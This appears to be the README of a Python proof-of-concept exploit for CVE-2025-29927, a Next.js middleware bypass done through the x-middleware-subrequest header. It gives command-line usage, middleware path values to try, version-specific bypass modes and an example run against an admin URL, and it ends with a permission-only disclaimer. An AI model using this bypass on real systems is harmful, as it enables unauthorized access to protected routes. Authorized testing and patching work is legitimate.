This is a Proof of Concept (PoC) exploit for the Next.js middleware bypass vulnerability identified as CVE-2025-29927. The vulnerability allows bypassing middleware protections by manipulating the x-middleware-subrequest header.
python3 poc.py --url <TARGET_URL> --middleware <MIDDLEWARE_PATH> [--version ]
--url
The target URL to test. Example: https://target.com/admin
--middleware
The middleware path to use for bypassing. Examples:
- middleware
- src/middleware
- pages/_middleware
--version (optional)
Version mode to use:
- 15 (default) β Use recursion bypass (Next.js >= 15)
- legacy β Use direct path match (Next.js < 15)
python3 poc.py --url https://example.com/admin --middleware src/middleware --version 15
This PoC is for educational purposes only. Use responsibly and only against systems you have permission to test.